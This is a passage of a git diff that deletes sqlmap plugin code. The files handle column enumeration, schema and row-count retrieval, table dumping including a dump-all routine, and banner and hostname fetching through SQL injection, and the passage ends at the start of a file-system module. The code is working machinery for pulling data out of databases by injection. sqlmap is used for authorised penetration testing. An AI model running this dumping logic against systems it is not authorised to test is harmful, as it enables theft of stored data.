unsafeSQLIdentificatorNaming(name.upper())) - else: - query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(name)) - comment = unArrayizeValue(inject.getValue(query, blind=False, time=False)) - else: - warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() - warnMsg += "possible to get column comments" - singleTimeWarnMessage(warnMsg) - - if len(columnData) == 1: - columns[name] = None - else: - if Backend.isDbms(DBMS.FIREBIRD): - columnData[1] = FIREBIRD_TYPES.get(int(columnData[1]) if isinstance(columnData[1], 
basestring) and columnData[1].isdigit() else columnData[1], columnData[1]) - - columns[name] = columnData[1] - - if conf.db in kb.data.cachedColumns: - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns - else: - table[safeSQLIdentificatorNaming(tbl, True)] = columns - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table - - elif isInferenceAvailable() and not conf.direct: - for tbl in tblList: - if conf.db is not None and len(kb.data.cachedColumns) > 0 \ - and conf.db in kb.data.cachedColumns and tbl in \ - kb.data.cachedColumns[conf.db]: - infoMsg = "fetched tables' columns on " - infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - return {conf.db: kb.data.cachedColumns[conf.db]} - - infoMsg = "fetching columns " - condQuery = "" - - if len(colList) > 0: - if colTuple: - _, colCondParam = colTuple - infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) - else: - colCondParam = "='%s'" - infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) - - condQueryStr = "%%s%s" % colCondParam - condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): - query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) - query += condQuery - - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) - query += condQuery - - elif Backend.isDbms(DBMS.MSSQL): - query = rootQuery.blind.count % (conf.db, conf.db, \ - unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) - query += condQuery.replace("[DB]", conf.db) - - elif Backend.isDbms(DBMS.FIREBIRD): - query = 
rootQuery.blind.count % (tbl) - query += condQuery - - elif Backend.isDbms(DBMS.SQLITE): - query = rootQuery.blind.query % tbl - value = unArrayizeValue(inject.getValue(query, union=False, error=False)) - parseSqliteTableSchema(value) - return kb.data.cachedColumns - - table = {} - columns = {} - - if dumpMode and colList: - count = 0 - for value in colList: - columns[safeSQLIdentificatorNaming(value)] = None - else: - infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - if Backend.isDbms(DBMS.MSSQL): - count, index, values = 0, 1, [] - while True: - query = rootQuery.blind.query3 % (conf.db, tbl, index) - value = unArrayizeValue(inject.getValue(query, union=False, error=False)) - if isNoneValue(value) or value == " ": - break - else: - columns[safeSQLIdentificatorNaming(value)] = None - index += 1 - - if not columns: - errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "") - errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.error(errMsg) - continue - - for index in getLimitRange(count): - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): - query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) - query += condQuery - field = None - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) - query += condQuery - field = None - elif Backend.isDbms(DBMS.MSSQL): - query = rootQuery.blind.query.replace("'%s'", "'%s'" % 
unsafeSQLIdentificatorNaming(tbl).split(".")[-1]).replace("%s", conf.db).replace("%d", str(index)) - query += condQuery.replace("[DB]", conf.db) - field = condition.replace("[DB]", conf.db) - elif Backend.isDbms(DBMS.FIREBIRD): - query = rootQuery.blind.query % (tbl) - query += condQuery - field = None - - query = agent.limitQuery(index, query, field, field) - column = unArrayizeValue(inject.getValue(query, union=False, error=False)) - - if not isNoneValue(column): - if conf.getComments: - _ = queries[Backend.getIdentifiedDbms()].column_comment - if hasattr(_, "query"): - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(column.upper())) - else: - query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(column)) - comment = unArrayizeValue(inject.getValue(query, union=False, error=False)) - else: - warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() - warnMsg += "possible to get column comments" - singleTimeWarnMessage(warnMsg) - - if not onlyColNames: - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db)) - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper())) - elif Backend.isDbms(DBMS.MSSQL): - query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db, - conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) - elif Backend.isDbms(DBMS.FIREBIRD): - query = rootQuery.blind.query2 % (tbl, column) - - colType = unArrayizeValue(inject.getValue(query, union=False, error=False)) - - if Backend.isDbms(DBMS.FIREBIRD): - colType = 
FIREBIRD_TYPES.get(colType, colType) - - column = safeSQLIdentificatorNaming(column) - columns[column] = colType - else: - column = safeSQLIdentificatorNaming(column) - columns[column] = None - - if columns: - if conf.db in kb.data.cachedColumns: - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns - else: - table[safeSQLIdentificatorNaming(tbl, True)] = columns - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table - - if not kb.data.cachedColumns: - warnMsg = "unable to retrieve column names for " - warnMsg += ("table '%s' " % unsafeSQLIdentificatorNaming(unArrayizeValue(tblList))) if len(tblList) == 1 else "any table " - warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.warn(warnMsg) - - if bruteForce is None: - return self.getColumns(onlyColNames=onlyColNames, colTuple=colTuple, bruteForce=True) - - return kb.data.cachedColumns - - def getSchema(self): - infoMsg = "enumerating database management system schema" - logger.info(infoMsg) - - try: - pushValue(conf.db) - pushValue(conf.tbl) - pushValue(conf.col) - - kb.data.cachedTables = {} - kb.data.cachedColumns = {} - - self.getTables() - - infoMsg = "fetched tables: " - infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." 
if \ - Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) \ - else ".", unsafeSQLIdentificatorNaming(t)) for t in tbl) for db, tbl in \ - kb.data.cachedTables.items()]) - logger.info(infoMsg) - - for db, tables in kb.data.cachedTables.items(): - for tbl in tables: - conf.db = db - conf.tbl = tbl - - self.getColumns() - finally: - conf.col = popValue() - conf.tbl = popValue() - conf.db = popValue() - - return kb.data.cachedColumns - - def _tableGetCount(self, db, table): - if not db or not table: - return None - - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - db = db.upper() - table = table.upper() - - if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): - query = "SELECT %s FROM %s" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(table, True)) - else: - query = "SELECT %s FROM %s.%s" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(table, True)) - - count = inject.getValue(query, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if isNumPosStrValue(count): - if safeSQLIdentificatorNaming(db) not in kb.data.cachedCounts: - kb.data.cachedCounts[safeSQLIdentificatorNaming(db)] = {} - - if int(count) in kb.data.cachedCounts[safeSQLIdentificatorNaming(db)]: - kb.data.cachedCounts[safeSQLIdentificatorNaming(db)][int(count)].append(safeSQLIdentificatorNaming(table, True)) - else: - kb.data.cachedCounts[safeSQLIdentificatorNaming(db)][int(count)] = [safeSQLIdentificatorNaming(table, True)] - - def getCount(self): - if not conf.tbl: - warnMsg = "missing table parameter, sqlmap will retrieve " - warnMsg += "the number of entries for all database " - warnMsg += "management system databases' tables" - logger.warn(warnMsg) - - elif "." 
in conf.tbl: - if not conf.db: - conf.db, conf.tbl = conf.tbl.split('.', 1) - - if conf.tbl is not None and conf.db is None and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): - warnMsg = "missing database parameter. sqlmap is going to " - warnMsg += "use the current database to retrieve the " - warnMsg += "number of entries for table '%s'" % unsafeSQLIdentificatorNaming(conf.tbl) - logger.warn(warnMsg) - - conf.db = self.getCurrentDb() - - self.forceDbmsEnum() - - if conf.tbl: - for table in conf.tbl.split(","): - self._tableGetCount(conf.db, table) - else: - self.getTables() - - for db, tables in kb.data.cachedTables.items(): - for table in tables: - self._tableGetCount(db, table) - - return kb.data.cachedCounts diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py deleted file mode 100644 index 86e088ef..00000000 --- a/plugins/generic/entries.py +++ /dev/null @@ -1,522 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.agent import agent -from lib.core.bigarray import BigArray -from lib.core.common import Backend -from lib.core.common import clearConsoleLine -from lib.core.common import getLimitRange -from lib.core.common import getSafeExString -from lib.core.common import getUnicode -from lib.core.common import isInferenceAvailable -from lib.core.common import isListLike -from lib.core.common import isNoneValue -from lib.core.common import isNumPosStrValue -from lib.core.common import isTechniqueAvailable -from lib.core.common import popValue -from lib.core.common import prioritySortColumns -from lib.core.common import pushValue -from lib.core.common import readInput -from lib.core.common import safeSQLIdentificatorNaming -from lib.core.common import unArrayizeValue -from lib.core.common import unsafeSQLIdentificatorNaming -from lib.core.data import conf -from lib.core.data import 
kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.dicts import DUMP_REPLACEMENTS -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import DBMS -from lib.core.enums import EXPECTED -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.exception import SqlmapNoneDataException -from lib.core.exception import SqlmapUnsupportedFeatureException -from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD -from lib.core.settings import CURRENT_DB -from lib.core.settings import NULL -from lib.request import inject -from lib.utils.hash import attackDumpedTable -from lib.utils.pivotdumptable import pivotDumpTable -from lib.utils.pivotdumptable import whereQuery - -class Entries: - """ - This class defines entries' enumeration functionalities for plugins. - """ - - def __init__(self): - pass - - def dumpTable(self, foundData=None): - self.forceDbmsEnum() - - if conf.db is None or conf.db == CURRENT_DB: - if conf.db is None: - warnMsg = "missing database parameter. 
sqlmap is going " - warnMsg += "to use the current database to enumerate " - warnMsg += "table(s) entries" - logger.warn(warnMsg) - - conf.db = self.getCurrentDb() - - elif conf.db is not None: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): - conf.db = conf.db.upper() - - if ',' in conf.db: - errMsg = "only one database name is allowed when enumerating " - errMsg += "the tables' columns" - raise SqlmapMissingMandatoryOptionException(errMsg) - - conf.db = safeSQLIdentificatorNaming(conf.db) - - if conf.tbl: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): - conf.tbl = conf.tbl.upper() - - tblList = conf.tbl.split(",") - else: - self.getTables() - - if len(kb.data.cachedTables) > 0: - tblList = kb.data.cachedTables.values() - - if isinstance(tblList[0], (set, tuple, list)): - tblList = tblList[0] - elif not conf.search: - errMsg = "unable to retrieve the tables " - errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - raise SqlmapNoneDataException(errMsg) - else: - return - - for tbl in tblList: - tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) - - for tbl in tblList: - conf.tbl = tbl - kb.data.dumpedTable = {} - - if foundData is None: - kb.data.cachedColumns = {} - self.getColumns(onlyColNames=True, dumpMode=True) - else: - kb.data.cachedColumns = foundData - - try: - kb.dumpTable = "%s.%s" % (conf.db, tbl) - - if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \ - or safeSQLIdentificatorNaming(tbl, True) not in \ - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] \ - or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]: - warnMsg = "unable to enumerate the columns for table " - warnMsg += "'%s' in database" % unsafeSQLIdentificatorNaming(tbl) - warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(conf.db) - warnMsg += ", skipping" if len(tblList) > 1 else "" - logger.warn(warnMsg) - - continue - - 
columns = kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] - colList = sorted(filter(None, columns.keys())) - - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] - - if not colList: - warnMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl) - warnMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - warnMsg += " (no usable column names)" - logger.warn(warnMsg) - continue - - colNames = colString = ", ".join(column for column in colList) - rootQuery = queries[Backend.getIdentifiedDbms()].dump_table - - infoMsg = "fetching entries" - if conf.col: - infoMsg += " of column(s) '%s'" % colNames - infoMsg += " for table '%s'" % unsafeSQLIdentificatorNaming(tbl) - infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - for column in colList: - _ = agent.preprocessField(tbl, column) - if _ != column: - colString = re.sub(r"\b%s\b" % re.escape(column), _, colString) - - entriesCount = 0 - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - entries = [] - query = None - - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = rootQuery.inband.query % (colString, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) - elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MAXDB): - query = rootQuery.inband.query % (colString, tbl) - elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): - # Partial inband and error - if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL): - table = "%s.%s" % (conf.db, tbl) - - retVal = pivotDumpTable(table, colList, blind=False) - - if retVal: - entries, _ = retVal - entries = zip(*[entries[colName] for colName in colList]) - else: - query = 
rootQuery.inband.query % (colString, conf.db, tbl) - elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): - query = rootQuery.inband.query % (colString, conf.db, tbl, prioritySortColumns(colList)[0]) - else: - query = rootQuery.inband.query % (colString, conf.db, tbl) - - query = whereQuery(query) - - if not entries and query: - entries = inject.getValue(query, blind=False, time=False, dump=True) - - if not isNoneValue(entries): - if isinstance(entries, basestring): - entries = [entries] - elif not isListLike(entries): - entries = [] - - entriesCount = len(entries) - - for index, column in enumerate(colList): - if column not in kb.data.dumpedTable: - kb.data.dumpedTable[column] = {"length": len(column), "values": BigArray()} - - for entry in entries: - if entry is None or len(entry) == 0: - continue - - if isinstance(entry, basestring): - colEntry = entry - else: - colEntry = unArrayizeValue(entry[index]) if index < len(entry) else u'' - - _ = len(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry))) - maxLen = max(len(column), _) - - if maxLen > kb.data.dumpedTable[column]["length"]: - kb.data.dumpedTable[column]["length"] = maxLen - - kb.data.dumpedTable[column]["values"].append(colEntry) - - if not kb.data.dumpedTable and isInferenceAvailable() and not conf.direct: - infoMsg = "fetching number of " - if conf.col: - infoMsg += "column(s) '%s' " % colNames - infoMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = rootQuery.blind.count % (tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) - elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): - query = rootQuery.blind.count % tbl - elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): - query = rootQuery.blind.count % ("%s.%s" % (conf.db, 
tbl)) - elif Backend.isDbms(DBMS.MAXDB): - query = rootQuery.blind.count % tbl - else: - query = rootQuery.blind.count % (conf.db, tbl) - - query = whereQuery(query) - - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - lengths = {} - entries = {} - - if count == 0: - warnMsg = "table '%s' " % unsafeSQLIdentificatorNaming(tbl) - warnMsg += "in database '%s' " % unsafeSQLIdentificatorNaming(conf.db) - warnMsg += "appears to be empty" - logger.warn(warnMsg) - - for column in colList: - lengths[column] = len(column) - entries[column] = [] - - elif not isNumPosStrValue(count): - warnMsg = "unable to retrieve the number of " - if conf.col: - warnMsg += "column(s) '%s' " % colNames - warnMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.warn(warnMsg) - - continue - - elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL): - if Backend.isDbms(DBMS.ACCESS): - table = tbl - elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): - table = "%s.%s" % (conf.db, tbl) - elif Backend.isDbms(DBMS.MAXDB): - table = "%s.%s" % (conf.db, tbl) - - retVal = pivotDumpTable(table, colList, count, blind=True) - - if retVal: - entries, lengths = retVal - - else: - emptyColumns = [] - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, plusOne=plusOne) - - if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: - for column in colList: - if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), union=False, error=False) == '0': - emptyColumns.append(column) - debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable) - debugMsg += "dumped as it appears to be empty" - logger.debug(debugMsg) - - try: - for index in indexRange: - for column in colList: - value = "" - - if column not in lengths: - 
lengths[column] = 0 - - if column not in entries: - entries[column] = BigArray() - - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): - query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index) - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = rootQuery.blind.query % (agent.preprocessField(tbl, column), - tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), - index) - elif Backend.isDbms(DBMS.SQLITE): - query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl, index) - - elif Backend.isDbms(DBMS.FIREBIRD): - query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), tbl) - - query = whereQuery(query) - - value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True) - value = '' if value is None else value - - _ = DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)) - lengths[column] = max(lengths[column], len(_)) - entries[column].append(value) - - except KeyboardInterrupt: - clearConsoleLine() - warnMsg = "Ctrl+C detected in dumping phase" - logger.warn(warnMsg) - - for column, columnEntries in entries.items(): - length = max(lengths[column], len(column)) - - kb.data.dumpedTable[column] = {"length": length, "values": columnEntries} - - entriesCount = len(columnEntries) - - if len(kb.data.dumpedTable) == 0 or (entriesCount == 0 and kb.permissionFlag): - warnMsg = "unable to retrieve the entries " - if conf.col: - warnMsg += "of columns '%s' " % colNames - warnMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - warnMsg += "in database '%s'%s" % (unsafeSQLIdentificatorNaming(conf.db), " (permission denied)" if kb.permissionFlag else "") - logger.warn(warnMsg) - else: - kb.data.dumpedTable["__infos__"] = {"count": entriesCount, - "table": safeSQLIdentificatorNaming(tbl, True), - "db": safeSQLIdentificatorNaming(conf.db)} - try: - 
attackDumpedTable() - except (IOError, OSError), ex: - errMsg = "an error occurred while attacking " - errMsg += "table dump ('%s')" % getSafeExString(ex) - logger.critical(errMsg) - conf.dumper.dbTableValues(kb.data.dumpedTable) - - except SqlmapConnectionException, ex: - errMsg = "connection exception detected in dumping phase " - errMsg += "('%s')" % getSafeExString(ex) - logger.critical(errMsg) - - finally: - kb.dumpTable = None - - def dumpAll(self): - if conf.db is not None and conf.tbl is None: - self.dumpTable() - return - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - errMsg = "information_schema not available, " - errMsg += "back-end DBMS is MySQL < 5.0" - raise SqlmapUnsupportedFeatureException(errMsg) - - infoMsg = "sqlmap will dump entries of all tables from all databases now" - logger.info(infoMsg) - - conf.tbl = None - conf.col = None - - self.getTables() - - if kb.data.cachedTables: - if isinstance(kb.data.cachedTables, list): - kb.data.cachedTables = { None: kb.data.cachedTables } - - for db, tables in kb.data.cachedTables.items(): - conf.db = db - - for table in tables: - try: - conf.tbl = table - kb.data.cachedColumns = {} - kb.data.dumpedTable = {} - - self.dumpTable() - except SqlmapNoneDataException: - infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table) - logger.info(infoMsg) - - def dumpFoundColumn(self, dbs, foundCols, colConsider): - message = "do you want to dump entries? 
[Y/n] " - output = readInput(message, default="Y") - - if output and output[0] not in ("y", "Y"): - return - - dumpFromDbs = [] - message = "which database(s)?\n[a]ll (default)\n" - - for db, tblData in dbs.items(): - if tblData: - message += "[%s]\n" % unsafeSQLIdentificatorNaming(db) - - message += "[q]uit" - test = readInput(message, default="a") - - if not test or test in ("a", "A"): - dumpFromDbs = dbs.keys() - elif test in ("q", "Q"): - return - else: - dumpFromDbs = test.replace(" ", "").split(",") - - for db, tblData in dbs.items(): - if db not in dumpFromDbs or not tblData: - continue - - conf.db = db - dumpFromTbls = [] - message = "which table(s) of database '%s'?\n" % unsafeSQLIdentificatorNaming(db) - message += "[a]ll (default)\n" - - for tbl in tblData: - message += "[%s]\n" % tbl - - message += "[s]kip\n" - message += "[q]uit" - test = readInput(message, default="a") - - if not test or test in ("a", "A"): - dumpFromTbls = tblData - elif test in ("s", "S"): - continue - elif test in ("q", "Q"): - return - else: - dumpFromTbls = test.replace(" ", "").split(",") - - for table, columns in tblData.items(): - if table not in dumpFromTbls: - continue - - conf.tbl = table - colList = filter(None, sorted(columns)) - - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] - - conf.col = ",".join(colList) - kb.data.cachedColumns = {} - kb.data.dumpedTable = {} - - data = self.dumpTable(dbs) - - if data: - conf.dumper.dbTableValues(data) - - def dumpFoundTables(self, tables): - message = "do you want to dump tables' entries? 
[Y/n] " - output = readInput(message, default="Y") - - if output and output[0].lower() != "y": - return - - dumpFromDbs = [] - message = "which database(s)?\n[a]ll (default)\n" - - for db, tablesList in tables.items(): - if tablesList: - message += "[%s]\n" % unsafeSQLIdentificatorNaming(db) - - message += "[q]uit" - test = readInput(message, default="a") - - if not test or test.lower() == "a": - dumpFromDbs = tables.keys() - elif test.lower() == "q": - return - else: - dumpFromDbs = test.replace(" ", "").split(",") - - for db, tablesList in tables.items(): - if db not in dumpFromDbs or not tablesList: - continue - - conf.db = db - dumpFromTbls = [] - message = "which table(s) of database '%s'?\n" % unsafeSQLIdentificatorNaming(db) - message += "[a]ll (default)\n" - - for tbl in tablesList: - message += "[%s]\n" % unsafeSQLIdentificatorNaming(tbl) - - message += "[s]kip\n" - message += "[q]uit" - test = readInput(message, default="a") - - if not test or test.lower() == "a": - dumpFromTbls = tablesList - elif test.lower() == "s": - continue - elif test.lower() == "q": - return - else: - dumpFromTbls = test.replace(" ", "").split(",") - - for table in dumpFromTbls: - conf.tbl = table - kb.data.cachedColumns = {} - kb.data.dumpedTable = {} - - data = self.dumpTable() - - if data: - conf.dumper.dbTableValues(data) diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py deleted file mode 100644 index 651285b9..00000000 --- a/plugins/generic/enumeration.py +++ /dev/null @@ -1,85 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import unArrayizeValue -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.enums import DBMS -from lib.core.session import setOs -from lib.parse.banner import 
bannerParser -from lib.request import inject -from plugins.generic.custom import Custom -from plugins.generic.databases import Databases -from plugins.generic.entries import Entries -from plugins.generic.search import Search -from plugins.generic.users import Users - -class Enumeration(Custom, Databases, Entries, Search, Users): - """ - This class defines generic enumeration functionalities for plugins. - """ - - def __init__(self): - kb.data.has_information_schema = False - kb.data.banner = None - kb.data.hostname = "" - kb.data.processChar = None - kb.data.characterSet = None - - Custom.__init__(self) - Databases.__init__(self) - Entries.__init__(self) - Search.__init__(self) - Users.__init__(self) - - def getBanner(self): - if not conf.getBanner: - return - - if kb.data.banner is None: - infoMsg = "fetching banner" - logger.info(infoMsg) - - if Backend.isDbms(DBMS.DB2): - rootQuery = queries[DBMS.DB2].banner - for query in (rootQuery.query, rootQuery.query2): - kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=False)) - if kb.data.banner: - break - else: - query = queries[Backend.getIdentifiedDbms()].banner.query - kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=False)) - - bannerParser(kb.data.banner) - - if conf.os and conf.os == "windows": - kb.bannerFp["type"] = set(["Windows"]) - - elif conf.os and conf.os == "linux": - kb.bannerFp["type"] = set(["Linux"]) - - elif conf.os: - kb.bannerFp["type"] = set(["%s%s" % (conf.os[0].upper(), conf.os[1:])]) - - if conf.os: - setOs() - - return kb.data.banner - - def getHostname(self): - infoMsg = "fetching server hostname" - logger.info(infoMsg) - - query = queries[Backend.getIdentifiedDbms()].hostname.query - - if not kb.data.hostname: - kb.data.hostname = unArrayizeValue(inject.getValue(query, safeCharEncode=False)) - - return kb.data.hostname diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py deleted file mode 100644 index d90a8fdf..00000000 --- 
a/plugins/generic/filesystem.py +++ /dev/null @@ -1,304 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import sys - -from lib.core.agent import agent -from lib.core.common import dataToOutFile -from lib.core.common import Backend -from lib.core.common import checkFile -from lib.core.common import decloakToTemp -from lib.core.common import decodeHexValue -from lib.core.common import getUnicode -from lib.core.common import isNumPosStrValue -from lib.core.common import isListLike -from lib.core.common import isStackingAvailable -from lib.core.common import isTechniqueAvailable -from lib.core.common import readInput -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import EXPECTED -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapUndefinedMethod -from lib.request import inject - -class Filesystem: - """ - This class defines generic OS file system functionalities for plugins. 
